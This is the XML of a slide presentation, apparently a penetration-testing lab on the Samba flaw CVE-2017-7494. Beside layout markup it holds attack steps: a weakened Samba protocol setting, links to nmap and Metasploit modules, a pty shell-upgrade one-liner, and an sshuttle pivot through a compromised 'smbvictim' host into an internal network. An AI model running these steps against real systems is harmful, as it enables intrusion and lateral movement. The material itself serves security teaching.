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Lst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId89"/>
      <p:boldItalic r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId91"/>
      <p:bold r:id="rId92"/>
      <p:italic r:id="rId93"/>
      <p:boldItalic r:id="rId94"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId95"/>
      <p:bold r:id="rId96"/>
      <p:italic r:id="rId97"/>
      <p:boldItalic r:id="rId98"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Didact Gothic"/>
      <p:regular r:id="rId99"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Thin"/>
      <p:regular r:id="rId100"/>
      <p:bold r:id="rId101"/>
      <p:italic r:id="rId102"/>
      <p:boldItalic r:id="rId103"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId104"/>
      <p:bold r:id="rId105"/>
      <p:italic r:id="rId106"/>
      <p:boldItalic r:id="rId107"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bree Serif"/>
      <p:regular r:id="rId10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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/BreeSerif-regular.fntdata"/><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font" Target="fonts/RobotoMonoThin-boldItalic.fntdata"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoThin-italic.fntdata"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoThin-bold.fntdata"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoThin-regular.fntdata"/><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95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DidactGothic-regular.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><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font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.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87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide83.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><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map.org/nsedoc/scripts/smb-vuln-cve-2017-7494.html"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ackoverflow.com/questions/29902700/os-detection-using-nmap-for-a-particular-ip-address" TargetMode="Externa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rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/samba/is_known_pipename.md" TargetMode="Externa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5dc4e38d7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5dc4e38d7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e622281866_1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e622281866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b83113e83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b83113e83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e622281866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e622281866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b83113e83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b83113e83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b83113e838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b83113e838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b83113e83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b83113e8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b83113e838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b83113e838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b83113e838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b83113e838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b83113e83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b83113e83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b83113e83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b83113e83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5c99e1ede3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5c99e1ede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b83113e838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b83113e838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[on ubuntu]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>server min protocol = NT1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server max protocol = NT1</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s">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[on ubuntu]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server min protocol = NT1</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server max protocol = NT1</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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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e5f928b22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e5f928b22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e622281866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e622281866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b83113e838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b83113e838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b83113e83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b83113e83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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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e620cf4dd9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e620cf4dd9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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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Link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nmap.org/nsedoc/scripts/smb-vuln-cve-2017-7494.html</a:t>
            </a:r>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e5f928b2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e5f928b2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b83113e838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b83113e838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b83113e838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b83113e838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python -c "import pty; pty.spawn('/bin/bash')"</a:t>
            </a:r>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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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b83113e838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e622281866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e622281866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e5f928b222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e5f928b222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e5e4ef1b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e5e4ef1b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e622281866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e622281866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e622281866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e622281866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e622281866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e622281866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e622281866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e622281866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e530f4f2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e530f4f2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e622281866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e622281866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e622281866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e622281866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e622281866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e622281866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b83113e838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b83113e838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e5f928b222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e5f928b222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b83113e838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b83113e838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sshuttle -r smbvictim@25.12.156.134 192.168.75.0/24</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b83113e838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b83113e838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e5f928b22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e5f928b22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e622281866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e622281866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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/29902700/os-detection-using-nmap-for-a-particular-ip-address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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b83113e838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b83113e838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e5f928b222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e5f928b222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e5f928b222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e5f928b222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b83113e838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b83113e838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e62c2f833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e62c2f833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e5f928b222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e5f928b222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e30b5503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e30b5503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e5f928b222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e5f928b222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e5f928b22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e5f928b22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e60f6bb5e8_0_8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e60f6bb5e8_0_8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e60f6bb5e8_0_8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e60f6bb5e8_0_8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e60f6bb5e8_0_8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e60f6bb5e8_0_8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e60f6bb5e8_0_89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e60f6bb5e8_0_89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e60f6bb5e8_0_8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e60f6bb5e8_0_8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e60f6bb5e8_0_89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e60f6bb5e8_0_8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b83113e838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b83113e838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e622281866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e622281866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e5f928b222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e5f928b222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e622281866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e622281866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e622281866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e622281866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300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/samba/is_known_pipename.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFil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b83113e838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b83113e838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e62228186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e62228186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5d5c1b5eee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5d5c1b5eee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e6222818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e6222818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TITLE" type="title">
  <p:cSld name="TITLE">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gra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5237375" y="3670025"/>
            <a:ext cx="3129600" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="48FFD5"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Roboto Black"/>
              <a:buNone/>
              <a:defRPr b="0" sz="300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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;10;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="3129600" cy="6066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
  <p:cSld name="TITLE_1_1_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="66" name="Shape 66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874944" y="35234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68" name="Google Shape;68;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6042106" y="31921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69" name="Google Shape;69;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1707794" y="3891050"/>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70" name="Google Shape;70;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3533994" y="342222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1" name="Google Shape;71;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5701156" y="30964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2" name="Google Shape;72;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366844" y="37896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3" name="Google Shape;73;p11"/>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GRAPHIC">
  <p:cSld name="TITLE_1_1_1_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="74" name="Shape 74"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5822506" y="25195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6" name="Google Shape;76;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5822506" y="394341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7" name="Google Shape;77;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5822506" y="3231488"/>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8" name="Google Shape;78;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5822506" y="197182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79" name="Google Shape;79;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5822506" y="271237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80" name="Google Shape;80;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5822506" y="344220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81" name="Google Shape;81;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7"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2">
  <p:cSld name="TITLE_1_1_1_2_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:grad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_1_1_2_2_1_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="84"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986575" y="1429225"/>
            <a:ext cx="3578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E2A47"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Roboto Black"/>
              <a:buNone/>
              <a:defRPr b="0" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986575" y="2421700"/>
            <a:ext cx="4470900" cy="187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TITLE_1_1_2_1_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="88"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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810000" y="2169000"/>
            <a:ext cx="8520600" cy="34164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Clr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-292100" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-292100" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-292100" lvl="3" marL="1828800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-292100" lvl="4" marL="2286000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-292100" lvl="5" marL="2743200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-292100" lvl="6" marL="3200400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-292100" lvl="7" marL="3657600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-292100" lvl="8" marL="4114800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="161234"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p15"/>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TITLE_1_1_2_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="92"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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810000" y="1478150"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-279400" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
